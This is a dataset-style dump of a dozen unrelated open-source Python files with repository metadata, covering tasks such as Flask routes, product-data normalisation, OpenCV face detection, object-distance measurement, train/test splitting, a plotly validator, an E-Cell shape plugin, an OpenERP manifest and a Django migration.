    # auto_commit wraps the soft-delete in a transaction; only active
    # (status=1) users can be deactivated.
    with db.auto_commit():
        user = User.query.filter_by(id=uid, status=1).first_or_404()
        user.delete()
    return DeleteSuccess()
@api.route("/test")
def test():
return render_template("test.html")
| [
"20065953@163.com"
] | 20065953@163.com |
a2168d5677c2caa4500d906a9740cd98471463ba | f5772316b7bf1316c8a673aed9007acd76b7d455 | /matching/tatacliq.py | 5b63d24c7df68904eff58ba5d17fa90a29598753 | [] | no_license | yuri0051/scraping | 7e5f0983790050f9366375a7a730aecb93c8ebd5 | aaf52d386ee1aca1f33377b2ed6adc7d63400cc6 | refs/heads/master | 2021-06-25T17:03:08.492990 | 2017-06-29T22:57:27 | 2017-06-29T22:57:27 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 624 | py | import pandas as pd
from pymongo import MongoClient
def tatacliq():
    # Pull every tatacliq.com product document from the local MongoDB
    # into a DataFrame, normalise each row, and print distinct categories.
    client = MongoClient()
    db = client.stores
    coll = db.full_collection.find({'source': 'tatacliq.com'})
    df = pd.DataFrame(list(coll))
    df = df.apply(get_lower, axis=1)
    print df['category'].unique()
def get_lower(row):
    """Normalise one product row in place and return it.

    * lower-cases the brand name;
    * maps singular category labels to their plural forms.

    Bug fix vs. the original: the bare ``except: pass`` swallowed every
    error, and a missing/non-string brand aborted the whole function so
    the category was never normalised. Each step now has its own
    targeted handler.
    """
    try:
        row['brand'] = row['brand'].lower()
    except (KeyError, AttributeError, TypeError):
        pass  # no brand field, or not a string — leave it untouched
    try:
        if row['category'] == 'air conditioner':
            row['category'] = 'air conditioners'
        elif row['category'] == 'laptop':
            row['category'] = 'laptops'
    except KeyError:
        pass  # row without a category
    return row
if __name__ == "__main__":
tatacliq()
| [
"yury0051@gmail.com"
] | yury0051@gmail.com |
3163d837b5c97aaf7f586933e8dcab6776af8bc3 | 640c447853ca3a7b5cd005fd1306b0086e2f026e | /extractor_mvp.py | 9a6387191b1e9f3bed64c172b6240927929b02e4 | [] | no_license | jordilag/handball_temp | aeef298954de95bae6d9768cb1f3b3aff7786a9a | 734334fa421e752b7d5c56287dffa4ba1d5b5803 | refs/heads/master | 2022-12-08T02:48:30.791519 | 2020-08-28T15:13:42 | 2020-08-28T15:13:42 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,616 | py | # -*- coding: utf-8 -*-
"""
Created on Tue Dec 31 08:16:22 2019
@author: FranciscoP.Romero
Player of the Match extractor
"""
import pandas as pd
headers = ['Match', 'Team','No.','Name', 'Role']
path = 'C:/Users/FranciscoP.Romero/Desktop/euro2020/'
match = '01'
team = ''
number = ''
values = []
rows_players = []
for i in range (1, 66):
match = (str(i) if (i >= 10) else ('0' + str(i)) )
state = 0
with open( path + match + '.csv') as f:
for linea in f:
if (linea.find('the Match') != -1):
lin_sepl = linea.split(sep=',')
# exttract team and number
if lin_sepl[1] == '':
team = lin_sepl[2]
number = lin_sepl[4]
else:
team = lin_sepl[1]
number = lin_sepl[3]
# extract name
name = ''
for l in lin_sepl[4:]:
if (l != '' and not l.isdigit()):
if (name == ''):
name += l.upper() + ' '
else:
name += l.strip()
# role goalkeeper or field player
role = 'FP' #if (name in goalkeepers) else 'FP'
## add file
rows_players.append([match, team, number, name, role])
import pandas as pd
df_players = pd.DataFrame(rows_players, columns = headers )
df_players.set_index('Match', inplace = True)
df_players.to_csv("euro2020_playersofthematch.csv")
| [
"franciscop.romero@uclm.es"
] | franciscop.romero@uclm.es |
94a080fcf8167830d057872fc075335e8ba477dd | fd27aa04f17b926bf09b3991f21b4f26c632a713 | /src/main/main.py | 7155b9662b77af89dc0850aada900bb049527af0 | [] | no_license | Ankitmahadevan/opencv-python-basic-project | e6a79c553e591cbee7153f3bed01375f5eb62bfd | ba9b29bf27c1cc43eba8b6cf8f9f9d069d3082b8 | refs/heads/master | 2020-03-21T16:40:44.913581 | 2016-06-05T16:42:57 | 2016-06-05T16:42:57 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,181 | py | import numpy as np
import cv2
# Webcam face + eye detection demo using Haar cascades. Press 'q' to quit.
cap = cv2.VideoCapture(0)

while (cap.isOpened()):
    # Capture frame-by-frame
    ret, frame = cap.read()

    # Our operations on the frame come here
    gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)

    # Face and eye cascade
    # NOTE(review): the classifiers are re-loaded from disk every frame;
    # hoisting these two lines above the loop would be much faster.
    face_cascade = cv2.CascadeClassifier('../resources/haarcascade_frontalface_default.xml')
    eye_cascade = cv2.CascadeClassifier('../resources/haarcascade_eye.xml')

    # Detect faces
    faces = face_cascade.detectMultiScale(gray, 1.3, 5)

    # Show detected faces
    for (x, y, w, h) in faces:
        cv2.rectangle(frame, (x, y), (x + w, y + h), (255, 0, 0), 1)
        # Search for eyes only inside each detected face region.
        roi_gray = gray[y:y + h, x:x + w]
        roi_color = frame[y:y + h, x:x + w]
        eyes = eye_cascade.detectMultiScale(roi_gray)

        # Show detected eyes
        for (ex, ey, ew, eh) in eyes:
            cv2.rectangle(roi_color, (ex, ey), (ex + ew, ey + eh), (0, 255, 0), 1)

    # Display the resulting frame
    cv2.imshow('OpenCV Basic Project', frame)

    # Close program by using key
    if cv2.waitKey(10) & 0xFF == ord('q'):
        break

# When everything done, release the capture
cap.release()
cv2.destroyAllWindows()
| [
"ugnius.malukas@gmail.com"
] | ugnius.malukas@gmail.com |
d54cd464f6c8823ed9926d5ad23dadc364c6000a | 664f0ef6973f813afcf1703906584fadd5569876 | /objectDistance.py | 081ec22059f7dfd617036c9123f6f460d3958036 | [] | no_license | tjan90/driver-fatigue-detection-tools | c0e781aed7d72ccc5e416d60ced852c4a0628527 | 42845f5158cf4b1513380e0628d8979e4987412f | refs/heads/main | 2023-06-12T13:00:54.336523 | 2021-06-15T19:32:03 | 2021-06-15T19:32:03 | 376,984,228 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,308 | py | # import the necessary packages
from scipy.spatial import distance as dist
from imutils import perspective
from imutils import contours
import numpy as np
import argparse
import imutils
import cv2
def midpoint(ptA, ptB):
    """Return the (x, y) midpoint between two 2-D points."""
    mid_x = (ptA[0] + ptB[0]) / 2.0
    mid_y = (ptA[1] + ptB[1]) / 2.0
    return (mid_x, mid_y)
# construct the argument parse and parse the arguments
#
# ap = argparse.ArgumentParser()
# ap.add_argument("-i", "--image", required=True,help="path to the input image")
# ap.add_argument("-w", "--width", type=float, required=True, help="width of the left-most object in the image (in inches)")
# args = vars(ap.parse_args())
def object_dist(image, width=1.0):
    """Annotate *image* with real-unit distances between objects.

    The left-most sufficiently-large contour is taken as the reference
    object; *width* is its known real-world width (e.g. inches), which
    fixes the pixels-per-unit ratio used to convert every measured pixel
    distance.

    Bug fixes vs. the original:
    * the pixel ratio read ``args["width"]`` from a commented-out argparse
      block and raised NameError — the width is now an explicit parameter
      (new trailing default keeps the call signature backward-compatible);
    * ``orig`` is initialised, so an image with no measurable second
      object returns None instead of raising NameError;
    * the ``imutils.is_cv2()`` branch called the same ``cv2.boxPoints``
      on both sides and was removed.

    Returns the last annotated frame (a fresh copy of *image* per measured
    object), or None when nothing beyond the reference was found.
    """
    # Edge map: grayscale -> blur -> Canny, then close small gaps.
    gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
    gray = cv2.GaussianBlur(gray, (7, 7), 0)
    edged = cv2.Canny(gray, 50, 100)
    edged = cv2.dilate(edged, None, iterations=1)
    edged = cv2.erode(edged, None, iterations=1)

    # External contours, sorted left-to-right so the reference comes first.
    cnts = cv2.findContours(edged.copy(), cv2.RETR_EXTERNAL,
                            cv2.CHAIN_APPROX_SIMPLE)
    cnts = imutils.grab_contours(cnts)
    (cnts, _) = contours.sort_contours(cnts)
    colors = ((0, 0, 255), (240, 0, 159), (0, 165, 255), (255, 255, 0),
              (255, 0, 255))
    refObj = None
    orig = None

    for c in cnts:
        # Ignore contours too small to be real objects.
        if cv2.contourArea(c) < 100:
            continue

        # Rotated bounding box, ordered top-left, top-right,
        # bottom-right, bottom-left; plus its centre.
        box = cv2.minAreaRect(c)
        box = cv2.boxPoints(box)
        box = np.array(box, dtype="int")
        box = perspective.order_points(box)
        cX = np.average(box[:, 0])
        cY = np.average(box[:, 1])

        if refObj is None:
            # First (left-most) object is the reference: derive the
            # pixels-per-unit ratio from its known real width.
            (tl, tr, br, bl) = box
            (tlblX, tlblY) = midpoint(tl, bl)
            (trbrX, trbrY) = midpoint(tr, br)
            D = dist.euclidean((tlblX, tlblY), (trbrX, trbrY))
            refObj = (box, (cX, cY), D / width)
            continue

        # Draw both outlines on a fresh copy of the input.
        orig = image.copy()
        cv2.drawContours(orig, [box.astype("int")], -1, (0, 255, 0), 2)
        cv2.drawContours(orig, [refObj[0].astype("int")], -1, (0, 255, 0), 2)

        # Pair up the four corners + centre of reference and object.
        refCoords = np.vstack([refObj[0], refObj[1]])
        objCoords = np.vstack([box, (cX, cY)])

        for ((xA, yA), (xB, yB), color) in zip(refCoords, objCoords, colors):
            cv2.circle(orig, (int(xA), int(yA)), 5, color, -1)
            cv2.circle(orig, (int(xB), int(yB)), 5, color, -1)
            cv2.line(orig, (int(xA), int(yA)), (int(xB), int(yB)),
                     color, 2)

            # Pixel distance -> real units via the reference ratio,
            # labelled at the segment midpoint.
            D = dist.euclidean((xA, yA), (xB, yB)) / refObj[2]
            (mX, mY) = midpoint((xA, yA), (xB, yB))
            cv2.putText(orig, "{:.1f}in".format(D), (int(mX), int(mY - 10)),
                        cv2.FONT_HERSHEY_SIMPLEX, 0.55, color, 2)

    # Return the last annotated comparison (None if nothing was measured).
    return orig
"tjan90@yahoo.com"
] | tjan90@yahoo.com |
d776af68f0585eb99721284de11db1090030affe | f860af784ebe80c5dc1ef09e9939c9439eb9e4a8 | /extract_feature/creat_dataframe_label.py | 89f50c4d4cfaa793ef825630e68f22bb78b80145 | [] | no_license | hanghust/preprocessing_data_for_sematic_segmentation | 6bd5b61b322e049b11512c6fb1c2eb989180aef7 | 553485919a3a247e054ffc6f6aa74af3138dd93e | refs/heads/main | 2023-01-14T02:16:15.355873 | 2020-11-17T02:13:48 | 2020-11-17T02:13:48 | 313,476,166 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,944 | py | from extract_information_image import extract_all_path, EDA_data_label
import numpy as np
import pandas as pd
# all file
def load_file_csv(path, file_name):
    """Concatenate every CSV found under *path* into one file and plot
    the label distribution.

    Writes ``<path><file_name>.csv`` and a matching ``.png`` EDA plot.

    Improvement vs. the original: DataFrames were appended one by one
    inside the loop (quadratic copying, and ``DataFrame.append`` is
    deprecated); all frames are now read first and merged with a single
    ``pd.concat``.
    """
    path_list = extract_all_path(path, 'csv')
    frames = [pd.read_csv(csv_path) for csv_path in path_list]
    data = pd.concat(frames)
    data.to_csv(path + file_name + '.csv', index=False)
    EDA_data_label(path + file_name + '.csv', path + file_name + '.png')


load_file_csv('data/data_0930_merge_2/data_unmerge/test/', 'data_test')
# each file
def split_train_test_data(path):
    """For every CSV under *path*, split its rows into train/test sets by image name.

    Images (grouped by 'names_image' + 'list_label') are shuffled and split
    roughly 80/20 at the image level, then the row-level frames are written to
    the hard-coded data_unmerge/train and data_unmerge/test directories, the
    larger split going to train. A label-distribution plot (PNG) is written
    next to each CSV via EDA_data_label.
    NOTE(review): np.random.rand is unseeded, so the split is not reproducible.
    """
    path_list = extract_all_path(path, 'csv')
    for path_file in path_list:
        data = pd.read_csv(path_file)
        # One row per (image, label) pair; count() is only used to collapse
        # duplicates before sampling.
        data_group = data.groupby(['names_image', 'list_label'], axis=0).count().reset_index()
        # Shuffle, then draw a random ~80/20 mask over the grouped images.
        data_group = data_group.sample(len(data_group))
        msk = np.random.rand(len(data_group)) < 0.8
        train_merge = data_group[msk]
        test_merge = data_group[~msk]
        print(train_merge.shape)
        print(test_merge.shape)
        # train.to_csv('data/data_0930_merge_2/train_merge.csv',index=False)
        # test.to_csv('data/data_0930_merge_2/test_merge.csv', index=False)
        # data = pd.read_csv('data/data_0930_merge_2/data_0930_merge_2.csv')
        # train_label = pd.read_csv('data/data_0930_merge_2/train_merge.csv')
        # NOTE(review): both selections use ~isin, i.e. 'train' holds rows NOT
        # in train_merge (and vice versa). Combined with the size comparison
        # below this still routes the bigger frame to train/, but the naming
        # looks inverted - confirm intent before relying on it.
        train = data[~data['names_image'].isin(train_merge['names_image'])]
        test = data[~data['names_image'].isin(test_merge['names_image'])]
        if len(train) > len(test):
            train.to_csv('data/data_0930_merge_2/data_unmerge/train/'+ path_file.split('/')[-1], index=False)
            EDA_data_label('data/data_0930_merge_2/data_unmerge/train/'+ path_file.split('/')[-1],
                           'data/data_0930_merge_2/data_unmerge/train/'+ (path_file.split('/')[-1]).split('.')[0]+'.png')
            test.to_csv('data/data_0930_merge_2/data_unmerge/test/'+ path_file.split('/')[-1], index=False)
            EDA_data_label('data/data_0930_merge_2/data_unmerge/test/' + path_file.split('/')[-1],
                           'data/data_0930_merge_2/data_unmerge/test/' + (path_file.split('/')[-1]).split('.')[0] + '.png')
        else:
            # Larger half came out in 'test': swap the destinations instead.
            train.to_csv('data/data_0930_merge_2/data_unmerge/test/' + path_file.split('/')[-1], index=False)
            EDA_data_label('data/data_0930_merge_2/data_unmerge/test/' + path_file.split('/')[-1],
                           'data/data_0930_merge_2/data_unmerge/test/' + (path_file.split('/')[-1]).split('.')[0] + '.png')
            test.to_csv('data/data_0930_merge_2/data_unmerge/train/' + path_file.split('/')[-1], index=False)
            EDA_data_label('data/data_0930_merge_2/data_unmerge/train/' + path_file.split('/')[-1],
                           'data/data_0930_merge_2/data_unmerge/train/' + (path_file.split('/')[-1]).split('.')[0] + '.png')
# split_train_test_data('data/data_0930_merge_2/')
| [
"hangnt@datascience.com.vn"
] | hangnt@datascience.com.vn |
d60e972614e566bef7cbc20eb726db3227df9346 | d41d18d3ea6edd2ec478b500386375a8693f1392 | /plotly/validators/pointcloud/_y.py | dfc46fe42092562d7111c7b05c2ec21d2a386694 | [
"MIT"
] | permissive | miladrux/plotly.py | 38921dd6618650d03be9891d6078e771ffccc99a | dbb79e43e2cc6c5762251537d24bad1dab930fff | refs/heads/master | 2020-03-27T01:46:57.497871 | 2018-08-20T22:37:38 | 2018-08-20T22:37:38 | 145,742,203 | 1 | 0 | MIT | 2018-08-22T17:37:07 | 2018-08-22T17:37:07 | null | UTF-8 | Python | false | false | 400 | py | import _plotly_utils.basevalidators
class YValidator(_plotly_utils.basevalidators.DataArrayValidator):
    """Data-array validator for the `y` property of a pointcloud trace."""

    def __init__(self, plotly_name='y', parent_name='pointcloud', **kwargs):
        # Delegate to the shared data-array validator; this trace's y data
        # triggers a recalc and clears the axis types when edited.
        base = _plotly_utils.basevalidators.DataArrayValidator
        base.__init__(
            self,
            plotly_name=plotly_name,
            parent_name=parent_name,
            edit_type='calc+clearAxisTypes',
            role='data',
            **kwargs
        )
| [
"adam.kulidjian@gmail.com"
] | adam.kulidjian@gmail.com |
1d82ced55124252a9363b7798cf2e4dd21ad0dfe | c9b9d81a0f6c68afefd093a18a14bcfcb95cdba6 | /master.py | dbde6b4d1f107d5af1fadc253aeb5affb9681ee3 | [] | no_license | loicpillard/Master | 6b43523a43acc251fcc23d1b7c80f9e952affc07 | 78012dc96da69bf2224648eed55bc8b4e2cdae47 | refs/heads/master | 2020-12-15T09:31:45.508211 | 2016-10-07T08:47:34 | 2016-10-07T08:47:34 | 43,424,053 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,823 | py | #!/usr/bin/python
L = ["E", "G0", "G1", "G2", "G3", "G4", "G4bis", "O", "R1", "R2", "R3", "R4", "R5", "R6", "R7", "R8", "R9", "SE", "SG0",
"SG1", "SG2", "SG3", "SG4", "SG4bis", "SO", "SR1", "SR2", "SR3", "SR4", "SR5", "SR6", "SR7", "SR8", "SR9"]
import stats
#for element in L:
#i = 1
#while i < 101:
#stats.fst_nbA(element+"/stats_"+element+"-"+str(i)+".txt", element+"/astar4_distances_pairwise_"+element+".txt",
#element+"/astar4_distances_from_AA_"+element+".txt", element+"/coordinates_"+element+".txt",
#element+"/fst_"+element+"-"+str(i)+".txt", element+"/nbA_"+element+"-"+str(i)+".txt")
#i += 1
#for element in L:
#i = 1
#while i < 101:
#stats.cluster_nbK(element+"/kmeans_ind_"+element+"-"+str(i)+".txt", element+"/kmeans_nbK_"+element+".txt")
#stats.cluster_continent(element+"/kmeans_ind_"+element+"-"+str(i)+".txt",
# element+"/kmeans_continent_"+element+".txt")
#stats.cluster_good(element+"/kmeans_ind_"+element+"-"+str(i)+".txt",
#element+"/kmeans_goodcluster_"+element+"-"+str(i)+".txt")
#i += 1
#stats.cluster_good_summary(element+"/kmeans_goodcluster_"+element,
#element+"/kmeans_goodcluster_summary_"+element+".txt")
#for element in L:
#stats.cluster_individuals_continent(element+"/kmeans_ind_"+element, element+"/kmeans_goodcluster_"+element,
#element+"/kmeans_continent_individuals_"+element+".txt")
#for element in L:
#i = 1
#while i < 101:
#stats.admixture(element+"/structure_"+element+"-"+str(i)+".txt", element+"/admixture"+element+"-"+str(i))
#i += 1
#for element in L:
#j = 1
#while j < 101:
#i = 1
#while i < 11:
#stats.admixture_rearrangement("populations/populations_"+element+".txt",
#element+"/admixture_"+element+"-"+str(j)+"."+str(i)+".Q",
#element+"/admixture_"+element+"-"+str(j)+"."+str(i)+".txt")
#i += 1
#j += 1
#for element in L:
#stats.admixture_bestK("admixtureK_"+element+".txt", "admixture_bestK_"+element+".txt", 10)
# Summarise per-run Procrustes outputs for every dataset code in L:
# one angle-summary file and one score-summary file per dataset directory.
for code in L:
    stats.procrustes_summary(
        code + "/procrustes_" + code,
        code + "/procrustes_summary_angle_" + code + ".txt",
        code + "/procrustes_summary_score_" + code + ".txt",
    )
#for element in L:
#stats.admixture_rearrangement("populations/populations_"+element+".txt",
#"kmeans_continent_individuals_"+element+".txt",
#"continent_individuals_"+element+".txt")
| [
"noreply@github.com"
] | loicpillard.noreply@github.com |
9f5938acd7bba762554269603c8837ab1e2e3158 | fbcc343b89fa01a1252528968f6b56f0254f831f | /ylpa/linprog_examples/ex04_reference_corner_plate_lowest_reinf.py | 011acdcc01e631c2f37ca95d8ab510d7de6d05c3 | [] | no_license | Vancikv/YLPA | 15b2cfdc9e21dad8f618aef63c46c7d4870ca19a | a53567782dd7b3eda2131dae62965c0859f2cde0 | refs/heads/master | 2021-01-10T15:19:25.370090 | 2016-01-18T19:13:08 | 2016-01-18T19:13:08 | 49,895,504 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,909 | py | '''
Created on 2. 6. 2015
@author: Kapsak
'''
from ylpa import \
Plate, Node, PlateSegment, \
ParametricStudy, YieldLine, Parameter, \
ParamNode, ParamPlate, PlateLoadUniform, \
Reinforcement, YLPATreeView
import numpy as np
# Plate half-dimensions: the slab spans 2*b in x and 2*a in y.
b = 3.
a = 2.
# Outline nodes of the plate. Nodes created with w=0. have their deflection
# fixed; n4/n5/n6 omit w and are left free.
# NOTE(review): fixed-vs-free reading is inferred from the w argument -
# confirm against the ylpa Node API.
n1 = Node(x=0., y=0., w=0.)
n2 = Node(x=2 * b, y=0., w=0.)
n3 = Node(x=2 * b, y=2 * a, w=0.)
n4 = Node(x=b, y=2 * a)
n5 = Node(x=0., y=2 * a)
n6 = Node(x=0., y=a)
# Two segments partition the plate; node_nos are 1-based indices into the
# node list above.
sg1 = PlateSegment(node_nos=[1, 2, 3, 4, 6])
sg2 = PlateSegment(node_nos=[4, 5, 6])
# Single yield line, apparently between nodes 6 and 4 (the segment border).
yl = [YieldLine(6, 4)]
reinforcement = [Reinforcement(p1=0.01, p2=0.01,
p1u=0.01, p2u=0.01,
node_name='reinforcement')]
plate = Plate(nodes=[n1, n2, n3, n4, n5, n6],
segments=[sg1, sg2],
yield_lines=yl,
plastic_moment_def_type="ortho_reinf_dep",
load=[PlateLoadUniform()],
reinforcement=reinforcement,
h=0.2,
)
pstudy = ParametricStudy(plate=plate,
node_params=[Parameter(base_value=b, minimum=0.01, maximum=2 * b - 0.01),
Parameter(base_value=a, minimum=0.01, maximum=2 * a - 0.01),
],
param_nodes=[ParamNode(node_no=4, trait_name="x", param_no=1, multiplier=1., base_value=0.),
ParamNode(node_no=6, trait_name="y", param_no=2, multiplier=1., base_value=0.)],
)
# print plate.unit_work_ratio
# print pstudy.min_work_ratio
# reinforcement[0].p1u = 0.005
# reinforcement[0].p2u = 0.005
# print pstudy.min_work_ratio
# reinforcement[0].p1u = 0.002
# reinforcement[0].p2u = 0.002
# print pstudy.min_work_ratio
view = YLPATreeView(root=pstudy)
view.configure_traits()
| [
"vla.vancik@gmail.com"
] | vla.vancik@gmail.com |
2528dacb9b7faf1b27138b6f716d590ff2de4129 | 2774cd543667e48ad2f44539ff77bac2e84265ef | /plugins/IonVariableSD.py | b038971651bb2387ca93587bb50a018aac59409b | [] | no_license | ecell/ecell3-model-editor | 279fbe6797224ad319caa66731309923aed4cee5 | 02fcbb7085bd1410dcafcfb980c5ad138795a724 | refs/heads/master | 2021-01-19T06:40:17.464207 | 2008-02-27T09:25:44 | 2008-02-27T09:25:44 | 1,831,094 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,637 | py | #::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
#
# This file is part of the E-Cell System
#
# Copyright (C) 1996-2007 Keio University
# Copyright (C) 2005-2007 The Molecular Sciences Institute
#
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
#
#
# E-Cell System is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public
# License as published by the Free Software Foundation; either
# version 2 of the License, or (at your option) any later version.
#
# E-Cell System is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public
# License along with E-Cell System -- see the file COPYING.
# If not, write to the Free Software Foundation, Inc.,
# 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
#
#END_HEADER
import numpy as nu
import ecell.ecs_constants as consts
from ecell.ui.model_editor.Constants import *
from ecell.ui.model_editor.ShapeDescriptor import *
SHAPE_PLUGIN_TYPE = OB_TYPE_VARIABLE #Shape Plugin Constants
SHAPE_PLUGIN_NAME = 'Ion'
OS_SHOW_LABEL=1
def estLabelDims(graphUtils, aLabel):
    """Estimate the pixel box needed for *aLabel*: measured text size plus
    a 3-pixel margin on every side. Returns (width, height)."""
    tx_height, tx_width = graphUtils.getTextDimensions(aLabel)
    return tx_width + 6, tx_height + 6
class IonVariableSD( ShapeDescriptor):
    """Shape descriptor drawing a Variable as an 'ion' glyph: two halves of
    IonVariableSD.png, a centred text label and four connection rings
    (top/bottom/left/right)."""
    def __init__( self, parentObject, graphUtils, aLabel ):
        ShapeDescriptor.__init__( self, parentObject, graphUtils, aLabel )
        # Control-point matrix: one [[x-coefficients],[y-coefficients]] pair
        # per point, interpreted by the ShapeDescriptor base when laying out
        # the shape. NOTE(review): the coefficient semantics live in the base
        # class; the values below are preserved verbatim from the original.
        self.thePointMatrix = nu.array([ [[1,0,0,0,0],[1,0,0,0,0]],[[1,0,4,4,1],[1,0,15,15,1]],[[1,0,4,2,0],[1,0,10,5,0]],[[1,0,4,1.25,0.5],[1,-0.65,0,1.25,0.65]],[[1,0,0,5,0.5],[1,0.25,1,-0.5,-0.15]],[[1,0,4,1.25,0.5],[1,0.45,0,1.25,3.15]],[[1,0,0,5,0.5],[1,1.05,1,0.5,2.65]],[[1,0,1,0.5,0],[1,1,-0.5,1,-0.15]],[[1,0,2,-2,0],[1,-0.1,0.25,9,0.75]],[[1,0,4,5,1],[1,1,-0.5,1,-0.15]],[[1,0,4,2.5,1],[1,-0.1,0.25,9,0.75]]])
        # Maps each drawn part to the indices of its control points above.
        self.theCodeMap = {\
#                    'frame' : [0,1],
                    'text' : [2],
                    RING_TOP : [3,4],
                    RING_BOTTOM : [5,6],
                    RING_LEFT : [7,8],
                    RING_RIGHT : [9,10],
                    "image" : [5],
                    "image2" : [9]
                    }
        # One entry per part: NAME, TYPE, FUNCTION, COLOR, Z, SPECIFIC, PROPERTIES.
        self.theDescriptorList = {\
        #NAME, TYPE, FUNCTION, COLOR, Z, SPECIFIC, PROPERTIES
#        'frame' : ['frame', CV_ELL, SD_FILL, SD_FILL, 7, [ [], 1 ] ],
        "image" : ["image",CV_IMG, SD_FILL, SD_FILL, 3, [ [], "IonVariableSD.png" ] ],\
        "image2" : ["image2",CV_IMG, SD_FILL, SD_FILL, 3, [ [], "IonVariableSD.png" ] ],\
        'text' : ['text', CV_TEXT, SD_FILL, SD_TEXT, 5, [ [], aLabel ] ],\
        RING_TOP : [RING_TOP, CV_RECT, SD_RING, SD_OUTLINE, 3, [ [],0 ] ],\
        RING_BOTTOM : [RING_BOTTOM, CV_RECT, SD_RING, SD_OUTLINE, 3, [ [], 0] ],\
        RING_LEFT : [RING_LEFT,CV_RECT, SD_RING, SD_OUTLINE, 3, [ [], 0] ],\
        RING_RIGHT : [RING_RIGHT, CV_RECT, SD_RING, SD_OUTLINE, 5, [ [], 0] ]}
        self.reCalculate()
    def estLabelWidth(self, aLabel):
        # Width needed for *aLabel*: text width plus one outline width per side.
        (tx_height, tx_width) = self.theGraphUtils.getTextDimensions( aLabel )
        return tx_width + self.olw*2
    def getRequiredWidth( self ):
        # Minimum shape width: current label width plus outline margins.
        self.calculateParams()
        return self.tx_width + self.olw*2
    def getRequiredHeight( self ):
        # Minimum shape height: label height plus a double outline margin.
        self.calculateParams()
        return self.tx_height+ self.olw*4
    def getRingSize( self ):
        # Connection rings are squares two outline-widths across.
        return self.olw*2
| [
"moriyoshi@f1531174-cb10-0410-9fe6-89aa7ac3eedb"
] | moriyoshi@f1531174-cb10-0410-9fe6-89aa7ac3eedb |
7a218a01ecbfc594cc00ff334d30ebe2489e5c13 | c324a6d923bae3a00bd1dc69a43d0e5c707a104a | /addons-vauxoo/hr_expense_replenishment/__openerp__.py | f75805678aedf47bc322db43b9213897c5e35bdc | [] | no_license | meswapnilwagh/odoo-adr | 5c593c2240d23b79811ccd7b5297b634e5ffe19d | 442c8d5fa52cab30028a26dd93bd8eae88d58fed | refs/heads/master | 2020-01-27T10:03:27.142715 | 2015-09-04T14:36:59 | 2015-09-04T14:36:59 | 50,238,226 | 0 | 4 | null | 2016-01-23T12:53:28 | 2016-01-23T12:53:25 | null | UTF-8 | Python | false | false | 2,537 | py | # -*- encoding: utf-8 -*-
###############################################################################
# Module Writen to OpenERP, Open Source Management Solution
# Copyright (C) OpenERP Venezuela (<http://openerp.com.ve>).
# All Rights Reserved
############# Credits #########################################################
# Coded by: Katherine Zaoral <kathy@vauxoo.com>
# Planified by: Humberto Arocha <hbto@vauxoo.com>
# Audited by: Humberto Arocha <hbto@vauxoo.com>
###############################################################################
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
###############################################################################
{
"name": "Expenses Replenishment",
"version": "0.1",
"author": "Vauxoo",
"category": "HR Module",
"description": """
Expenses Replenishment
======================
This module add the functionality to the HR Expense module to manage deductible
expenses by using invoices asociated to an expense document. Also make an
automation of the reconciliation process for the expense and the employee
payment.
Dependencies information
------------------------
- You can download the *account_invoice_line_currency* module from::
bzr branch lp:addons-vauxoo/7.0
""",
"website": "http://openerp.com.ve",
"license": "",
"depends": [
"hr_expense",
"account_invoice_line_currency",
"hr_expense_analytic",
"account_move_report"
],
"demo": [],
"data": [
"security/hr_security.xml",
"wizard/hr_expense_wizard_view.xml",
"view/account_invoice_view.xml",
"view/hr_expense_view.xml",
"workflow/workflow.xml"
],
"test": [],
"js": [],
"css": [],
"qweb": [],
"installable": True,
"auto_install": False,
"active": False
} | [
"tecnologia@obsdr.com"
] | tecnologia@obsdr.com |
eed553fcbac8ff8f4d3035a692503463afc204bc | b27543728fe3de41b2ba7666b2ec8ee4c378f6f8 | /users/migrations/0002_alter_profile_image.py | 6c7caa50a16435370e095b5370b224f144f7703f | [] | no_license | jasonantao/image_repository | 2fddd5dbee366dbb8e5204d2a73ee4d1a9c6566a | c8b2426a793d182763f6f8a33ee473a786363879 | refs/heads/master | 2023-07-12T06:27:18.141249 | 2021-08-14T13:43:42 | 2021-08-14T13:43:42 | 365,867,662 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 410 | py | # Generated by Django 3.2.2 on 2021-05-09 19:32
from django.db import migrations, models
class Migration(migrations.Migration):
    """Change Profile.image's default picture to 'default_1.jpg'
    (upload target stays 'profile_pics')."""
    # Must run after the initial users migration that created Profile.
    dependencies = [
        ('users', '0001_initial'),
    ]
    operations = [
        migrations.AlterField(
            model_name='profile',
            name='image',
            field=models.ImageField(default='default_1.jpg', upload_to='profile_pics'),
        ),
    ]
| [
"jasantao99@gmail.com"
] | jasantao99@gmail.com |
